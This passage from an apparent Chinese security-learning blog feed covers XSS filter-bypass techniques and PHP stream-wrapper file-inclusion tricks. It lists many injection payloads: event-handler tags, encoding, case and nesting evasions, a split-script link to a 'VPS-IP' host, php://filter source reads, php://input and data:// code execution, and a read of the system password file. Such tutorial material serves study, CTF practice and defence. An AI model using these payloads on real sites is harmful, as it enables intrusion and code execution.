onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button onmouseup=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button onmousedown=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/button&gt;</span><br></pre></td></tr></table></figure><h4 id="0x08-div标签"><a class="markdownIt-Anchor" href="#0x08-div标签"></a> 0x08. div标签</h4><p>这个需要借助url编码来实现绕过</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">原代码：</span><br><span class="line">&lt;div onmouseover=&#x27;alert(1)&#x27;&gt;DIV&lt;/div&gt;</span><br><span class="line">经过url编码：</span><br><span class="line">&lt;div onmouseover%3d&#x27;alert%26lpar%3b1%26rpar%3b&#x27;&gt;DIV&lt;%2fdiv&gt;</span><br></pre></td></tr></table></figure><h4 id="0x09-object标签"><a class="markdownIt-Anchor" href="#0x09-object标签"></a> 0x09. &lt;object标签</h4><p>这个需要借助 data 伪协议和 base64 编码来实现绕过</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;object data=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=&quot;&gt;&lt;/object&gt;</span><br></pre></td></tr></table></figure><h4 id="0x10-script-标签"><a class="markdownIt-Anchor" href="#0x10-script-标签"></a> 0x10. script 标签</h4><p>(窝用过最多的)(doge)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;</span><br><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br><span class="line">&lt;script&gt;alert(123)&lt;/script&gt;</span><br></pre></td></tr></table></figure><h4 id="0x11-p-标签"><a class="markdownIt-Anchor" href="#0x11-p-标签"></a> 0x11. p 标签</h4><p>(骗你的，窝也没用过)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;p onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/p&gt;</span><br><span class="line">&lt;p onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/p&gt;</span><br><span class="line">&lt;p onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/p&gt;</span><br><span class="line">&lt;p onmouseup=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/p&gt;</span><br></pre></td></tr></table></figure><h4 id="0x12-input-标签"><a class="markdownIt-Anchor" href="#0x12-input-标签"></a> 0x12. input 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;input onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;input onfocus=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;input onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus=&quot;&quot;&gt;</span><br><span class="line">&lt;input onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; onkeydown=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/input&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; onkeypress=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/input&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; onkeydown=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/input&gt;</span><br></pre></td></tr></table></figure><h4 id="0x13-details标签"><a class="markdownIt-Anchor" href="#0x13-details标签"></a> 0x13. details标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;details ontoggle=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/details&gt;</span><br><span class="line">&lt;details ontoggle=&quot;alert(&#x27;xss&#x27;);&quot; open=&quot;&quot;&gt;&lt;/details&gt;</span><br></pre></td></tr></table></figure><h4 id="0x14-select-标签"><a class="markdownIt-Anchor" href="#0x14-select-标签"></a> 0x14. &lt;select 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;select onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus&gt;&lt;/select&gt;</span><br><span class="line">&lt;select onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/select&gt;</span><br><span class="line">&lt;select onclick=eval(&quot;alert(&#x27;xss&#x27;);&quot;)&gt;&lt;/select&gt;</span><br></pre></td></tr></table></figure><h4 id="0x15-form-标签"><a class="markdownIt-Anchor" href="#0x15-form-标签"></a> 0x15. &lt;form 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method=&quot;x&quot; action=&quot;x&quot; onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;input type=submit&gt;&lt;/form&gt; </span><br><span class="line">&lt;form method=&quot;x&quot; action=&quot;x&quot; onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;input type=submit&gt;&lt;/form&gt; </span><br><span class="line">&lt;form method=&quot;x&quot; action=&quot;x&quot; onmouseup=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;input type=submit&gt;&lt;/form&gt;</span><br></pre></td></tr></table></figure><h4 id="0x16-body标签"><a class="markdownIt-Anchor" href="#0x16-body标签"></a> 0x16.  &lt;body标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body onload=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure><h3 id="2常用绕过姿势汇总"><a class="markdownIt-Anchor" href="#2常用绕过姿势汇总"></a> 2.常用绕过姿势汇总</h3><h4 id="1关键词置空绕过"><a class="markdownIt-Anchor" href="#1关键词置空绕过"></a> 1.关键词置空绕过</h4><p>注：置空指将关键词替换成空格，当过滤为其他字符时该方法不再适用，得考虑对字符做处理</p><h5 id="0x01-大小写绕过"><a class="markdownIt-Anchor" href="#0x01-大小写绕过"></a> 0x01. 大小写绕过</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure><p>可以转换为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;ScRiPt&gt;AlErT(/xss/)&lt;/sCrIpT&gt;</span><br></pre></td></tr></table></figure><p>（当然有些时候会强制转换大小写，例如<code>raw=raw.lower()</code>，这样大小写绕过就不管用了QAQ）</p><h5 id="0x02-嵌套绕过"><a class="markdownIt-Anchor" href="#0x02-嵌套绕过"></a> 0x02. 嵌套绕过</h5><p>嵌套<script>和</script>突破</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure><p>可以转换为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sc&lt;script&gt;ript&gt;alert(/xss/)&lt;/sc&lt;/script&gt;ript&gt;</span><br></pre></td></tr></table></figure><h4 id="2编码绕过"><a class="markdownIt-Anchor" href="#2编码绕过"></a> 2.编码绕过</h4><p>我们已知浏览器对 XSS 代码的解析顺序为：<strong>HTML解码 —— URL解码 —— JS解码(只支持UNICODE)</strong></p><p>因此我们可以对此使用编码绕过。</p><h5 id="1-html-实体编码"><a class="markdownIt-Anchor" href="#1-html-实体编码"></a> 1. html 实体编码</h5><p><strong>当可控点为单个标签属性时，可以使用 html 实体编码。</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;可控点&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;可控点&quot;&gt;test&lt;iframe&gt;</span><br><span class="line">&lt;img src=x onerror=&quot;可控点&quot;&gt;</span><br></pre></td></tr></table></figure><p><strong>Payload</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure><p><strong>十进制</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure><p><strong>十六进制</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure><p><strong>可以不带分号</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3a&amp;#x61&amp;#x6c&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x31&amp;#x29&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure><p><strong>可以填充0</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x006a&amp;#x0061&amp;#x0076&amp;#x0061&amp;#x0073&amp;#x0063&amp;#x0072&amp;#x0069&amp;#x0070&amp;#x0074&amp;#x003a&amp;#x0061&amp;#x006c&amp;#x0065&amp;#x0072&amp;#x0074&amp;#x0028&amp;#x0031&amp;#x0029&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure><h5 id="2-url-编码"><a class="markdownIt-Anchor" href="#2-url-编码"></a> 2. url 编码</h5><p><strong>当注入点存在 href 或者 src 属性时，可以使用 url 编码。</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;可控点&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;可控点&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure><p><strong>Payload</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;javascript:alert(1)&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure><p><strong>注：url 解析过程中，不能对协议类型进行任何的编码操作，所以 javascript: 协议头需要保留。</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:%61%6c%65%72%74%28%31%29&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;javascript:%61%6c%65%72%74%28%31%29&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure><p><strong>可以二次编码</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:%2561%256c%2565%2572%2574%2528%2531%2529&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;javascript:%2561%256c%2565%2572%2574%2528%2531%2529&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure><h5 id="3js编码"><a class="markdownIt-Anchor" href="#3js编码"></a> 3.js编码</h5><p>先空着(doge)</p><h4 id="3空格过滤绕过"><a class="markdownIt-Anchor" href="#3空格过滤绕过"></a> 3.空格过滤绕过</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;&lt;img**AA**src**AA**onerror**BB**=**BB**alert**CC**(1)**DD**&lt;/html&gt;</span><br></pre></td></tr></table></figure><p>A位置可填充 /，/123/，%09，%0A，%0C，%0D，%20 B位置可填充 %09，%0A，%0C，%0D，%20 C位置可填充 %0B，/**/，如果加了双引号，则可以填充 %09，%0A，%0C，%0D，%20 D位置可填充 %09，%0A，%0C，%0D，%20，//，&gt;</p><h4 id="4圆括号过滤绕过"><a class="markdownIt-Anchor" href="#4圆括号过滤绕过"></a> 4.圆括号过滤绕过</h4><ol><li>反引号替换（比较常见），单引号过滤也可以用` 绕过</li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert`1`&lt;/script&gt;</span><br></pre></td></tr></table></figure><ol start="2"><li>throw 绕过(个人没用过)</li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;video src onerror=&quot;javascript:window.onerror=alert;throw 1&quot;&gt;</span><br><span class="line">&lt;svg/onload=&quot;window.onerror=eval;throw&#x27;=alert\x281\x29&#x27;;&quot;&gt;</span><br></pre></td></tr></table></figure><p><code>onload</code>：当 SVG 元素及其资源加载完成后触发。事件触发时会执行后面的 JavaScript 代码</p><p><code>window.onerror = eval;</code>：<code>window.onerror</code> 是一个全局的错误处理函数，当 JavaScript 执行时发生错误，它会被调用。通过将其设置为 <code>eval</code>，攻击者可以劫持错误处理并执行恶意的 JavaScript 代码</p><p><code>throw '=alert\x281\x29';</code>：这行代码通过 <code>throw</code> 抛出一个异常<code>alert(1)</code></p><h4 id="5alert-过滤绕过"><a class="markdownIt-Anchor" href="#5alert-过滤绕过"></a> 5.alert 过滤绕过</h4><p>1.prompt 替换</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;prompt(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure><p>2.confirm 替换</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;confirm(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure><p>3.console.log 替换</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;console.log(3)&lt;/script&gt;</span><br></pre></td></tr></table></figure><p>4.document.write 替换</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;document.write(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure><ol start="5"><li>base64 绕过</li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;Function`a$&#123;atob`YWxlcnQoMSk=`&#125;```&quot;&gt;</span><br><span class="line">&lt;img src=x onerror=&quot;``.constructor.constructor`a$&#123;atob`YWxlcnQoMSk=`&#125;```&quot;&gt;</span><br></pre></td></tr></table></figure><h4 id="6函数拼接绕过"><a class="markdownIt-Anchor" href="#6函数拼接绕过"></a> 6.函数拼接绕过</h4><ol><li>eval</li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;eval(&#x27;al&#x27;+&#x27;ert(1)&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure><ol start="2"><li>top</li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;top[&#x27;al&#x27;+&#x27;ert&#x27;](1)&quot;&gt;</span><br></pre></td></tr></table></figure><ol start="3"><li>window</li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;window[&#x27;al&#x27;+&#x27;ert&#x27;](1)&quot;&gt;</span><br></pre></td></tr></table></figure><ol start="4"><li>self</li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;self[`al`+`ert`](1)&quot;&gt;</span><br></pre></td></tr></table></figure><ol start="5"><li>parent</li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;parent[`al`+`ert`](1)&quot;&gt;</span><br></pre></td></tr></table></figure><ol start="6"><li>frames</li></ol><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;frames[`al`+`ert`](1)&quot;&gt;</span><br></pre></td></tr></table></figure><h4 id="7分割关键字绕过"><a class="markdownIt-Anchor" href="#7分割关键字绕过"></a> 7.分割关键字绕过</h4><p>通过在关键字中插入空格或注释符号（ <code>/**/</code>）来分隔函数名</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a/**/l/**/ert(1)</span><br></pre></td></tr></table></figure><h3 id="长度限制绕过"><a class="markdownIt-Anchor" href="#长度限制绕过"></a> 长度限制绕过</h3><h4 id="用拆分法"><a class="markdownIt-Anchor" href="#用拆分法"></a> 用拆分法</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;a=&#x27;document.write(&quot;&#x27;&lt;/script&gt;</span><br><span class="line">&lt;script&gt;a=a+&#x27;&lt;a href=ht&#x27;&lt;/script&gt;</span><br><span class="line">&lt;script&gt;a=a+&#x27;tp://VPS-IP:po&#x27;&lt;/script&gt;</span><br><span class="line">&lt;script&gt;a=a+&#x27;rt&gt;hack&lt;/a&gt;&quot;)&#x27;&lt;/script&gt;</span><br><span class="line">&lt;script&gt;eval(a)&lt;/script&gt;</span><br></pre></td></tr></table></figure><h4 id="用嵌套结构"><a class="markdownIt-Anchor" href="#用嵌套结构"></a> 用嵌套结构</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=1 onerror=&quot;document.write(&#x27;&lt;img src=1 onerror=alert(1)&gt;&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure><h3 id="分号绕过"><a class="markdownIt-Anchor" href="#分号绕过"></a> 分号绕过</h3><p>当只过滤了分号时，可以利用花括号进行语句隔离</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;&#123;onerror=alert&#125;throw 1&lt;/script&gt;</span><br></pre></td></tr></table></figure><p>当浏览器遇到 <code>throw 1</code> 时，它会抛出一个错误</p><p>抛出错误时，<code>onerror</code> 事件会被触发，因为我们之前将 <code>onerror</code> 设置为了 <code>alert</code> 函数</p><p>结果是，浏览器会弹出一个对话框，显示 <code>1</code>，这就是 <code>alert(1)</code> 的效果</p><p>未来再补充</p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2025/11/23/xss%E5%9F%BA%E7%A1%80/</id>
    <link href="https://cl1ck-t0.github.io/2025/11/23/xss%E5%9F%BA%E7%A1%80/"/>
    <published>2025-11-23T15:30:36.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>xss基础</title>
    <updated>2026-04-19T08:13:49.463Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="PHP" scheme="https://cl1ck-t0.github.io/tags/PHP/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="php伪协议"><a class="markdownIt-Anchor" href="#php伪协议"></a> PHP伪协议</h1><h2 id="一php支持的伪协议"><a class="markdownIt-Anchor" href="#一php支持的伪协议"></a> 一.PHP支持的伪协议</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">1 file:// — 访问本地文件系统</span><br><span class="line">2 http:// — 访问 HTTP(s) 网址</span><br><span class="line">3 ftp:// — 访问 FTP(s) URLs</span><br><span class="line">4 php:// — 访问各个输入/输出流（I/O streams）</span><br><span class="line">5 zlib:// — 压缩流</span><br><span class="line">6 data:// — 数据（RFC 2397）</span><br><span class="line">7 glob:// — 查找匹配的文件路径模式</span><br><span class="line">8 phar:// — PHP 归档</span><br><span class="line">9 ssh2:// — Secure Shell 2</span><br><span class="line">10 rar:// — RAR</span><br><span class="line">11 ogg:// — 音频流</span><br><span class="line">12 expect:// — 处理交互式的流</span><br></pre></td></tr></table></figure><h2 id="二详解"><a class="markdownIt-Anchor" href="#二详解"></a> 二.详解</h2><h3 id="1phpfilter"><a class="markdownIt-Anchor" href="#1phpfilter"></a> 1.php://filter</h3><p>元封装器。文件过滤筛选。php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行。从而导致 任意文件读取。</p><p>eg.[ACTF2020 新生赛]Include1</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://71a5b17a-a293-4fe5-95a3-99aa00f4c77a.node5.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php #PHP伪协议</span><br><span class="line">http://71a5b17a-a293-4fe5-95a3-99aa00f4c77a.node5.buuoj.cn:81/?file=flag.php #原有URL</span><br></pre></td></tr></table></figure><p>上述也是比较常用的。</p><table><thead><tr><th>名称</th><th>描述</th></tr></thead><tbody><tr><td>resource=&lt;要过滤的数据流&gt;</td><td>这个参数是必须的。它指定了你要筛选过滤的数据流。</td></tr><tr><td><code>read=&lt;读链的筛选列表&gt;</code></td><td>该参数可选。可以设定一个或多个过滤器名称，以管道符（`</td></tr><tr><td>write=&lt;写链的筛选列表&gt;</td><td>该参数可选。可以设定一个或多个过滤器名称，以管道符（`</td></tr><tr><td>&lt;；两个链的筛选列表&gt;</td><td>任何没有以 <code>read=</code> 或 <code>write=</code> 作前缀 的筛选器列表会视情况应用于读或写链。</td></tr></tbody></table><h3 id="过滤器"><a class="markdownIt-Anchor" href="#过滤器"></a> 过滤器</h3><h4 id="字符串过滤器"><a class="markdownIt-Anchor" href="#字符串过滤器"></a> 字符串过滤器</h4><p>该类通常以string开头，对每个字符都进行同样方式的处理。</p><p>string.rot13</p><p>一种字符处理方式，字符右移十三位。</p><p>string.toupper</p><p>将所有字符转换为大写。</p><p>string.tolower</p><p>将所有字符转换为小写。</p><p>string.strip_tags<br />这个过滤器就比较有意思，用来处理掉读入的所有标签，例如XML的等等。在绕过死亡exit大有用处。</p><h4 id="转换过滤器"><a class="markdownIt-Anchor" href="#转换过滤器"></a> 转换过滤器</h4><p>对数据流进行编码，通常用来读取文件源码。</p><p>convert.base64-encode &amp; convert.base64-decode</p><p>base64加密解密</p><p>convert.quoted-printable-encode &amp; convert.quoted-printable-decode</p><p>可以翻译为可打印字符引用编码，使用可以打印的ASCII编码的字符表示各种编码形式下的字符。</p><p>补充资料：<a href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html">https://www.leavesongs.com/PENETRATION/php-filter-magic.html</a></p><h3 id="2data"><a class="markdownIt-Anchor" href="#2data"></a> 2.data://</h3><p>数据流封装器，以传递相应格式的数据。可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行。</p><p>eg.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1、data://text/plain,</span><br><span class="line">http://127.0.0.1/include.php?file=data://text/plain,&lt;?php%20phpinfo();?&gt;</span><br><span class="line"> </span><br><span class="line">2、data://text/plain;base64,</span><br><span class="line">http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b</span><br></pre></td></tr></table></figure><h3 id="3-file"><a class="markdownIt-Anchor" href="#3-file"></a> 3 file://</h3><p>用于访问本地文件系统，并且不受allow_url_fopen，allow_url_include影响<br />file://协议主要用于访问文件(绝对路径、相对路径以及网络路径)<br />比如：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.xx.com?file=file:///etc/passsword</span><br></pre></td></tr></table></figure><h3 id="4-php"><a class="markdownIt-Anchor" href="#4-php"></a> 4 php://</h3><p>在allow_url_fopen，allow_url_include都关闭的情况下可以正常使用<br />php://作用为访问输入输出流</p><p>包含php://filter和php://input</p><h3 id="5-phpinput"><a class="markdownIt-Anchor" href="#5-phpinput"></a> 5 php://input</h3><p>php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。</p><p>例如：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/cmd.php?cmd=php://input</span><br></pre></td></tr></table></figure><p>POST数据：<?php phpinfo()?><br />注意：<br />当enctype=&quot;multipart/form-data&quot;的时候 php://input` 是无效的</p><p>遇到file_get_contents()要想到用php://input绕过。</p><p>其中php://input通常与</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php system(&#x27; &#x27;)?&gt;</span><br></pre></td></tr></table></figure><p>联合使用，用于读取文件内容，查看目录等等。</p><h3 id="6-zip"><a class="markdownIt-Anchor" href="#6-zip"></a> 6 zip://</h3><p>zip:// 可以访问压缩包里面的文件。当它与包含函数结合时，zip://流会被当作php文件执行。从而实现任意代码执行。</p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2025/11/16/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/</id>
    <link href="https://cl1ck-t0.github.io/2025/11/16/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/"/>
    <published>2025-11-16T01:26:16.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>php伪协议</title>
    <updated>2026-02-17T11:48:04.368Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="http" scheme="https://cl1ck-t0.github.io/tags/http/"/>
    <content>
